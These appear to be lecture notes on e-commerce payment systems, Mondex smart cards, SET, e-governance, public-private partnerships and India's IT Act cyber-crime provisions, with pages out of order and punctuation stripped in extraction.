How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 3
3
E-Cash
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
PREPARED BY ARUN PRATAP SINGH 4
4
E-Wallet
The E-wallet is another payment scheme that operates like a carrier of e-cash and other
information
The aim is to give shoppers a single simple and secure way of carrying currency
electronically
Trust is the basis of the e-wallet as a form of electronic payment
Procedure for using an e-wallet
1 Decide on an online site where you would like to shop
2 Download a wallet from the merchantrsquos website
3 Fill out personal information such as your credit card number name address and phone
number and where merchandise should be shipped
4 When you are ready to buy click on the wallet button the buying process is fully
executed
PREPARED BY ARUN PRATAP SINGH 5
5
Smart Cards
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
Smart card Processing
PREPARED BY ARUN PRATAP SINGH 6
6
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Credit cards
It is a Plastic Card having a Magnetic Number and code on it
It has Some fixed amount to spend
Customer has to repay the spend amount after sometime
PREPARED BY ARUN PRATAP SINGH 7
7
Processing a Credit cards payment ndash
Risk in using Credit cards -
Operational Risk
Credit Risk
Legal Risk
Secure Electronic Transaction (SET) Protocol
Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM
GTE SAIC and others
Designed to provide security for card payments as they travel on the Internet
Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers
and merchants in addition to providing secure transmission
SET specification
Uses public key cryptography and digital certificates for validating both
consumers and merchants
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
